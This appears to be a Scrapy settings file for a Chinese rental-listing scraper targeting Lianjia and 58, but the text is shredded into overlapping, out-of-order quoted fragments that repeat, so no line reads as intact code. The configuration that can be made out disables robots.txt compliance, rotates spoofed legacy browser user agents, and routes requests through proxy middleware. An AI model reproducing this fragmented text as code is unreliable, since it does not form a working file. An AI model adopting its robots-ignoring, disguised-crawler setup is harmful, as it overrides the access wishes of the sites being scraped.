Enable showing throttling", "9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR ' '2.0.50727)',", "6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET", "-*- from house_renting.spider_settings import lianjia, a58 BOT_NAME = 'house_renting' COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES", "= 2.0 # Enable showing throttling stats for every response received: AUTOTHROTTLE_DEBUG =", "' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko)", "'/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True # Enable and configure the AutoThrottle extension (disabled by", "# -*- coding: utf-8 -*- from house_renting.spider_settings import lianjia, a58 BOT_NAME = 'house_renting'", "Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible;", "Windows NT 9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;", "= [ {'host': 'elastic', 'port': 9200}, ] REDIS_HOST = 'redis' # 默认为 None,", "be sending in parallel to # each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 #", "U; MSIE 9.0; Windows NT 9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT", "' '.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)',", "6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; ' '.NET CLR 3.5.30729; .NET", "to # each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # Enable showing throttling stats", "rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11;", "en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705", "AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3)", "Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0", "{ 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE = '/house-renting/data/images'", "Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR ' '3.0.30729;", "X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac", "response received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES = 3 LOG_LEVEL =", "AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # Enable showing throttling stats for every response received: AUTOTHROTTLE_DEBUG", "'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware':", "(KHTML, like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4)", "Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML,", "None, 不会存储到 ES ELASTIC_HOSTS = [ {'host': 'elastic', 'port': 9200}, ] REDIS_HOST =", "(compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322;", "'INFO' SPIDER_SETTINGS = { 'lianjia': { 'cities': lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, },", "'cities': lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58': { 'cities': a58.cities, 'available_cities': a58.available_cities,", "AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;", "'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like", "(compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727;", "PC 5.0; ' '.NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild", "configure the AutoThrottle extension (disabled by default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True", "= 'house_renting' COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT =", "download delay AUTOTHROTTLE_START_DELAY = 10 # The maximum download delay to be set", "不会存储到 ES ELASTIC_HOSTS = [ {'host': 'elastic', 'port': 9200}, ] REDIS_HOST = 'redis'", "OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel", "(X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U;", "5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5',", "(Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel", "Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY = False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED", "'available_cities_map': a58.available_cities_map, }, } # ES 节点, 可以配置多个节点(集群), 默认为 None, 不会存储到 ES ELASTIC_HOSTS", "10 # The average number of requests Scrapy should be sending in parallel", "set in case of high latencies AUTOTHROTTLE_MAX_DELAY = 10 # The average number", "DOWNLOAD_TIMEOUT = 30 RETRY_TIMES = 3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS = { 'lianjia':", "{'host': 'elastic', 'port': 9200}, ] REDIS_HOST = 'redis' # 默认为 None, 不会去重 REDIS_PORT", "\\ 'Safari/605.1.15 ' USER_AGENTS = ( 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;", "10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \\ 'Safari/605.1.15 ' USER_AGENTS = (", "Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; ' '.NET CLR 3.5.30729; .NET CLR", "CLR 1.1.4322; .NET CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT", "i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML,", "Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80", "U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (' 'Change:", "(Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY =", "'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES =", "200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True #", "'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3", "'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True # Enable", "extension (disabled by default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True # The initial", "'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52', )", "en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR", "= True # The initial download delay AUTOTHROTTLE_START_DELAY = 10 # The maximum", "200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100,", "= { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, }", "'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1", "Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \\ 'Safari/605.1.15", "(X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1;", "'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows;", "'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729;", "(compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media", ".NET CLR 2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT", "'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11;", "server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # Enable showing throttling stats for every response received:", "initial download delay AUTOTHROTTLE_START_DELAY = 10 # The maximum download delay to be", "from house_renting.spider_settings import lianjia, a58 BOT_NAME = 'house_renting' COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES =", "# The initial download delay AUTOTHROTTLE_START_DELAY = 10 # The maximum download delay", "'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 '", "6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0", "utf-8 -*- from house_renting.spider_settings import lianjia, a58 BOT_NAME = 'house_renting' COMMANDS_MODULE = 'house_renting.commands'", "NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac", "= False DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES = {", "like Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U;", "TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES =", "Trident/5.0; .NET CLR 3.5.30729; .NET CLR ' '3.0.30729; .NET CLR 2.0.50727; Media Center", "10.6.8; U; fr) Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY = False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN", "(Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11; Linux", "U; fr) Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY = False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN =", ".NET CLR 3.5.30729; .NET CLR ' '3.0.30729; .NET CLR 2.0.50727; Media Center PC", "K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0", "CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like", "SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300,", "number of requests Scrapy should be sending in parallel to # each remote", "c9dfb30)', 'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0", "None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300,", "CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)', 'Mozilla/5.0", "BOT_NAME = 'house_renting' COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT", "showing throttling stats for every response received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT = 30", "Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1;", "True # Enable and configure the AutoThrottle extension (disabled by default) # See", "Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0", ".NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b;", "requests Scrapy should be sending in parallel to # each remote server AUTOTHROTTLE_TARGET_CONCURRENCY", "Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like", "# Enable showing throttling stats for every response received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT", "like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15", "1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR", "5.0; ' '.NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35;", "# each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # Enable showing throttling stats for", "and configure the AutoThrottle extension (disabled by default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED =", "Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0;", "5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9)", "= { 'lianjia': { 'cities': lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58': {", "'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727;", "average number of requests Scrapy should be sending in parallel to # each", "a58.available_cities, 'available_cities_map': a58.available_cities_map, }, } # ES 节点, 可以配置多个节点(集群), 默认为 None, 不会存储到 ES", "'available_cities_map': lianjia.available_cities_map, }, '58': { 'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, }, }", "= True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES = 3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS =", "should be sending in parallel to # each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0", "' '.NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows", "import lianjia, a58 BOT_NAME = 'house_renting' COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE", "['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4)", "6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac OS", "10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac OS", ".NET CLR 2.0.50727; InfoPath.2; .NET CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows NT", "'.NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT", "{ 'cities': lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58': { 'cities': a58.cities, 'available_cities':", "Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7", "'Safari/605.1.15 ' USER_AGENTS = ( 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;", "} SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware':", "REDIS_HOST = 'redis' # 默认为 None, 不会去重 REDIS_PORT = 6379 # 默认 6379", "Center PC 5.0; ' '.NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5;", "AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR '", "'3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3)", "like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML,", "(compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2;", "# The maximum download delay to be set in case of high latencies", "Center PC 6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0;", "SLCC2; .NET CLR 2.0.50727; ' '.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR", "节点, 可以配置多个节点(集群), 默认为 None, 不会存储到 ES ELASTIC_HOSTS = [ {'host': 'elastic', 'port': 9200},", "'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh;", ".NET CLR 2.0.50727; ' '.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705;", "coding: utf-8 -*- from house_renting.spider_settings import lianjia, a58 BOT_NAME = 'house_renting' COMMANDS_MODULE =", "10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS = {", "'port': 9200}, ] REDIS_HOST = 'redis' # 默认为 None, 不会去重 REDIS_PORT = 6379", "2.0.50727; Media Center PC 5.0; ' '.NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0;", "'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100,", "'lianjia': { 'cities': lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58': { 'cities': a58.cities,", "(KHTML, like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre)", "[ {'host': 'elastic', 'port': 9200}, ] REDIS_HOST = 'redis' # 默认为 None, 不会去重", "ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE", "U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows NT", "CLR 2.0.50727; Media Center PC 5.0; ' '.NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE", "(compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET", "7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR", "Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows;", "x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR ' '3.0.30729; .NET CLR 2.0.50727; Media", "default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True # The initial download delay AUTOTHROTTLE_START_DELAY", "} # ES 节点, 可以配置多个节点(集群), 默认为 None, 不会存储到 ES ELASTIC_HOSTS = [ {'host':", "Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; ' '.NET CLR 3.0.04506)',", "= '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True # Enable and configure the AutoThrottle extension (disabled", "lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58': { 'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, },", "' USER_AGENTS = ( 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser;", "9200}, ] REDIS_HOST = 'redis' # 默认为 None, 不会去重 REDIS_PORT = 6379 #", ".NET CLR 2.0.50727; Media Center PC 5.0; ' '.NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible;", "= False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED =", "CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET", "400, } IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True # Enable and configure the", "fr) Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY = False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1", "DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None,", "7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR", "AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (' 'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11; U;", "3.5.30729; .NET CLR ' '3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0", "CLR 1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET", "默认为 None, 不会存储到 ES ELASTIC_HOSTS = [ {'host': 'elastic', 'port': 9200}, ] REDIS_HOST", "AutoThrottle extension (disabled by default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True # The", "AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \\ 'Safari/605.1.15 ' USER_AGENTS = ( 'Mozilla/4.0", "'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET", "Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11", "] REDIS_HOST = 'redis' # 默认为 None, 不会去重 REDIS_PORT = 6379 # 默认", "Scrapy should be sending in parallel to # each remote server AUTOTHROTTLE_TARGET_CONCURRENCY =", "} ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, }", "NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE", "MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; '", "'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline':", "Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR ' '3.0.30729; .NET CLR 2.0.50727;", "en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like", "# ES 节点, 可以配置多个节点(集群), 默认为 None, 不会存储到 ES ELASTIC_HOSTS = [ {'host': 'elastic',", "Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U; Linux", "= 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS =", "Gecko, Safari/419.3) Arora/0.3 (' 'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+", "2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;", "'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U; Linux i686; en-US;", "' '2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)', 'Mozilla/5.0 (compatible;", "DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES", "each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # Enable showing throttling stats for every", "'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U;", "Safari/419.3) Arora/0.3 (' 'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML,", "See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True # The initial download delay AUTOTHROTTLE_START_DELAY = 10", "CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo", "X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \\ 'Safari/605.1.15 ' USER_AGENTS =", "100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 